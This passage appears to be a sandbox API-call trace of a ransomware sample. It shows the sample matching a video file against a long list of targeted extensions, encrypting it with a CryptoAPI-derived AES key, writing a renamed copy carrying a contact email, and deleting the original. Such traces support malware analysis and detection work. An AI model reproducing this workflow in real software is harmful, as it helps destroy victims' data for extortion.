	[0201.102] lstrcpyW (in: lpString1=0x1889b4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0201.102] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="60jDjQN9l5w2UkePxX.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\60jDjQN9l5w2UkePxX.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\60jDjQN9l5w2UkePxX.flv"
	[0201.103] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\60jDjQN9l5w2UkePxX.flv") returned 134
	[0201.103] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.103] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\60jDjQN9l5w2UkePxX.flv", cchLength=0x86 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv") returned 0x86
	[0201.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.103] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.103] lstrcpyW (in: lpString1=0x18855c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv"
	[0201.103] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv") returned 134
	[0201.104] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.104] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.104] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0201.104] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.104] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.104] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.105] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.105] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.108] ReadFile (in: hFile=0x3ac, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0xb996, lpNumberOfBytesRead=0x187f10, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x187f10*=0xb996, lpOverlapped=0x0) returned 1
	[0201.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.112] CryptAcquireContextW (in: phProv=0x187ac0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x187ac0*=0xfcb2a8) returned 1
	[0201.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.114] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x187ac4 | out: phHash=0x187ac4) returned 1
	[0201.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.115] CryptHashData (hHash=0xfb9570, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.115] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb9570, dwFlags=0x1, phKey=0x187ac8 | out: phKey=0x187ac8*=0xfb90b0) returned 1
	[0201.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.115] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x187adc*=0xb996, dwBufLen=0xb996 | out: pbData=0x0*, pdwDataLen=0x187adc*=0xb9a0) returned 1
	[0201.117] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.117] RtlMoveMemory (in: Destination=0xfecb40, Source=0xfe11a0, Length=0xb996 | out: Destination=0xfecb40) 
	[0201.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.117] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfecb40*, pdwDataLen=0x187abc*=0xb996, dwBufLen=0xb9a0 | out: pbData=0xfecb40*, pdwDataLen=0x187abc*=0xb9a0) returned 1
	[0201.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.119] CryptDestroyKey (hKey=0xfb90b0) returned 1
	[0201.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.120] CryptDestroyHash (hHash=0xfb9570) returned 1
	[0201.120] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.120] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0201.120] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.120] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187ad8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187ad8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.121] GetUserNameA (in: lpBuffer=0x1879bc, pcbBuffer=0x187ad4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187ad4) returned 1
	[0201.123] wsprintfW (in: param_1=0x187af0, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 176
	[0201.123] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0
	[0201.123] WriteFile (in: hFile=0x3b0, lpBuffer=0xfecb40*, nNumberOfBytesToWrite=0xb9a0, lpNumberOfBytesWritten=0x187f18, lpOverlapped=0x0 | out: lpBuffer=0xfecb40*, lpNumberOfBytesWritten=0x187f18*=0xb9a0, lpOverlapped=0x0) returned 1
	[0201.129] CloseHandle (hObject=0x3b0) returned 1
	[0201.129] CloseHandle (hObject=0x3ac) returned 1
	[0201.129] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv")) returned 1
	[0201.136] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\60jdjqn9l5w2ukepxx.flv")) returned 0
	[0201.136] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37f69e20, ftCreationTime.dwHighDateTime=0x1d97211, ftLastAccessTime.dwLowDateTime=0x5952900, ftLastAccessTime.dwHighDateTime=0x1d97582, ftLastWriteTime.dwLowDateTime=0x5952900, ftLastWriteTime.dwHighDateTime=0x1d97582, nFileSizeHigh=0x0, nFileSizeLow=0x152a8, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="7uPxTvsZGEKuH-t.swf", cAlternateFileName="7UPXTV~1.SWF")) returned 1
	[0201.136] lstrcmpW (lpString1="7uPxTvsZGEKuH-t.swf", lpString2="..") returned 1
	[0201.136] lstrcmpW (lpString1="7uPxTvsZGEKuH-t.swf", lpString2=".") returned 1
